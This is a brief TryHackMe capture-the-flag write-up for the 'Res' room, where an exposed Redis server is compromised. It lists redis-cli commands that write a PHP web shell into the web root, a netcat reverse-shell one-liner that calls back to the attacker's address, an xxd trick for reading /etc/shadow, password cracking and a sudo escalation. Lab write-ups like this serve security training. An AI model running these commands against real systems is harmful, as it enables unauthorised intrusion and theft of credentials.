💥{THM} Res

Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge. Since I do not touch more about Redis and this machine related to Redis, let try have a look and compromise this machine. Redis Database challenge.

Step 1 – Enumeration.

As usual, do checking on open port.

Since the author mention about redis, let focus on port 6379. Here I will use hacktrick as reference.

Step 2 – Exploit Redis Database

For connected into the redis, use simple command

redis-cli -h TCM_IP

From the info, we know that user for this machine are vianka.

Next, reading some article from hacktrick, this redis can be exploit by inserting web shell and command injection.

config set dir /var/www/html
config set dbfilename shell.php
set test "<?php system($_GET['cmd']) ?>"
save

Next, test our directory and shell before injecting with command injection.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc UR_IP 1337 >/tmp/f

Step 3 – User Access

Running our injection will produce reverse shell and we successfully enter as www-data.

Referring to gtfobin, we can read sensitive data here.

xxd /etc/shadow | xxd -r

Saving all the hash and crack using John The Ripper.

Step 5 – Privilege Escalation

Change the user to vianka and change the user sudo permission.

WOWOW… just sudo to flag and we manage to read it.

VOILAA.

Leaning.

1. Redis Database

2. XXD exploit.